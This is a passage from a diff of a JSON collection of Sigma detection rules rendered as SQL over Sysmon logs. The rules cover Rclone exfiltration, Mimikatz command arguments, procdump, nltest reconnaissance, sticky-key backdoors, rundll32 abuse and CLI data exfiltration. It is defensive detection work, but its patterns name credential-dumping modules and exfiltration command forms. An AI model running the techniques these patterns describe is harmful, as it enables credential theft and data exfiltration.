'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\nmap.exe' ESCAPE '\\' OR Image LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_webshell_detection.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { "title": "HackTool - GMER Rootkit Detector and Remover Execution", @@ -24633,1656 +24673,1693 @@ "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((Image LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", - "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "title": "Gpg4Win Decrypt Files From Suspicious Locations", + "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "status": "experimental", + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_gpg4win_susp_usage.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Procdump Execution", + "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects usage of the SysInternals Procdump utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Legitimate use of procdump by a developer or administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_nltest_recon.yml" + "filename": "proc_creation_win_sysinternals_procdump.yml" }, { - "title": "HackTool - Mimikatz Execution", - "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", - "status": "test", - "description": "Detection well-known mimikatz command line arguments", - "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", + "title": "Potential Russian APT Credential Theft Activity", + "id": "b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee", + "status": "stable", + "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "attack.t1003.006" + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%xcopy /S /E /C /Q /H \\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%adexplorer -snapshot \"\" c:\\\\users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\downloads\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.snp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" + "filename": "proc_creation_win_apt_bear_activity_gtr19.yml" }, { - "title": "Sticky Key Like Backdoor Execution", - "id": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "status": "test", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "title": "Potential Recon Activity Using Wevtutil", + "id": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "status": "experimental", + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.discovery" ], "falsepositives": [ - "Unlikely" + "Legitimate usage of the utility by administrators to query the event log" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\winlogon.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wt.exe' ESCAPE '\\') AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%Magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%Narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%DisplaySwitch.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '% qe %' ESCAPE '\\' OR CommandLine LIKE '% query-events %' ESCAPE '\\') AND (CommandLine LIKE '%Microsoft-Windows-TerminalServices-LocalSessionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft-Windows-Terminal-Services-RemoteConnectionManager/Operational%' ESCAPE '\\' OR CommandLine LIKE '%Security%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_wevtutil_recon.yml" }, { - "title": "Suspicious Rundll32 Activity", - "id": "e593cf51-88db-4ee1-b920-37e89012a3c9", - "status": "test", - "description": "Detects suspicious process related to rundll32 based on arguments", - "author": "juju4, Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali", + "title": "RunDLL32 Spawning Explorer", + "id": "caa06de8-fdef-4c91-826a-7f9e163eef4b", + "status": "experimental", + "description": "Detects RunDLL32.exe spawning explorer.exe as child, which is very uncommon, often observes Gamarue spawning the explorer.exe process in an unusual way", + "author": "elhoim, CD_ROM_", "tags": [ "attack.defense_evasion", "attack.t1218.011" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%javascript:%' ESCAPE '\\' AND CommandLine LIKE '%.RegisterXLL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURLA%' ESCAPE '\\') OR (CommandLine LIKE '%url.dll%' ESCAPE '\\' AND CommandLine LIKE '%FileProtocolHandler%' ESCAPE '\\') OR (CommandLine LIKE '%zipfldr.dll%' ESCAPE '\\' AND CommandLine LIKE '%RouteTheCall%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%Control\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%shell32.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShellExec\\_RunDLL%' ESCAPE '\\') OR (CommandLine LIKE '%mshtml.dll%' ESCAPE '\\' AND CommandLine LIKE '%PrintHTML%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%advpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchINFSection%' ESCAPE '\\') OR (CommandLine LIKE '%ieadvpack.dll%' ESCAPE '\\' AND CommandLine LIKE '%RegisterOCX%' ESCAPE '\\') OR (CommandLine LIKE '%ieframe.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%shdocvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%OpenURL%' ESCAPE '\\') OR (CommandLine LIKE '%syssetup.dll%' ESCAPE '\\' AND CommandLine LIKE '%SetupInfObjectInstallAction%' ESCAPE '\\') OR (CommandLine LIKE '%setupapi.dll%' ESCAPE '\\' AND CommandLine LIKE '%InstallHinfSection%' ESCAPE '\\') OR (CommandLine LIKE '%pcwutl.dll%' ESCAPE '\\' AND CommandLine LIKE '%LaunchApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbApplication%' ESCAPE '\\') OR (CommandLine LIKE '%dfshim.dll%' ESCAPE '\\' AND CommandLine LIKE '%ShOpenVerbShortcut%' ESCAPE '\\') OR (CommandLine LIKE '%scrobj.dll%' ESCAPE '\\' AND CommandLine LIKE '%GenerateTypeLib%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%shimgvw.dll%' ESCAPE '\\' AND CommandLine LIKE '%ImageView\\_Fullscreen%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%shell32.dll,Control\\_RunDLL desk.cpl,screensaver,@screensaver%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\rundll32.exe\" Shell32.dll,Control\\_RunDLL \"C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.cpl\",' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT (ParentCommandLine LIKE '%\\\\shell32.dll,Control\\_RunDLL%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_susp_activity.yml" + "filename": "proc_creation_win_rundll32_spawn_explorer.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Mstsc.EXE Execution From Uncommon Parent", + "id": "ff3b6b39-e765-42f9-bb2c-ea6761e0e0f6", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (Image LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\brave.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\CCleanerBrowser.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chrome.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\chromium.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\firefox.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msedge.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\opera.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\whale.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\') AND (Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe'))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml" }, { - "title": "Suspicious Registration via cscript.exe", - "id": "28c8f68b-098d-45af-8d43-8089f3e35403", + "title": "Allow Service Access Using Security Descriptor Tampering Via Sc.EXE", + "id": "6c8fbee5-dee8-49bc-851d-c3142d02aa47", "status": "experimental", - "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", - "author": "Austin Songer @austinsonger", + "description": "Detects suspicious DACL modifications to allow access to a service from a suspicious trustee. This can be used to override access restrictions set by previous ACLs.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\cscript.exe' ESCAPE '\\' AND CommandLine LIKE '%-register%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.22000.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.19041.0\\\\x64%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows Kits\\\\10\\\\bin\\\\10.0.17763.0\\\\x64%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%A;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_registration_via_cscript.yml" + "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", - "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Password Spraying Attempt Using Dsacls.EXE", + "id": "bac9fb54-2da7-44e9-988f-11e9a5edbc0c", + "status": "experimental", + "description": "Detects possible password spraying attempts using Dsacls", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate use of dsacls to bind to an LDAP session" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsacls.exe' ESCAPE '\\' OR OriginalFileName = 'DSACLS.EXE') AND (CommandLine LIKE '%/user:%' ESCAPE '\\' AND CommandLine LIKE '%/passwd:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_dsacls_password_spray.yml" }, { - "title": "Domain Trust Discovery Via Dsquery", - "id": "3bad990e-4848-4a78-9530-b427d854aac0", - "status": "test", - "description": "Detects execution of \"dsquery.exe\" for domain trust discovery", - "author": "E.M. Anhaus, Tony Lambert, oscd.community, omkar72", + "title": "WmiPrvSE Spawned A Process", + "id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "status": "stable", + "description": "Detects WmiPrvSE spawning a process", + "author": "Roberto Rodriguez @Cyb3rWard0g", + "tags": [ + "attack.execution", + "attack.t1047" + ], + "falsepositives": [ + "False positives are expected (e.g. in environments where WinRM is used legitimately)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\WmiPrvSe.exe' ESCAPE '\\' AND NOT ((LogonId IN ('0x3e7', 'null')) OR ((User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR (Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\') OR (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\') OR (LogonId = '')))" + ], + "filename": "proc_creation_win_wmiprvse_spawning_process.yml" + }, + { + "title": "PUA - Advanced Port Scanner Execution", + "id": "54773c5f-f1cc-4703-9126-2f797d96a69d", + "status": "experimental", + "description": "Detects the use of Advanced Port Scanner.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.discovery", - "attack.t1482" + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Legitimate use of the utilities by legitimate user for legitimate reason" + "Legitimate administrative use", + "Tools with similar commandline (very rare)" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dsquery.exe' ESCAPE '\\' OR OriginalFileName = 'dsquery.exe') AND CommandLine LIKE '%trustedDomain%' ESCAPE '\\')" 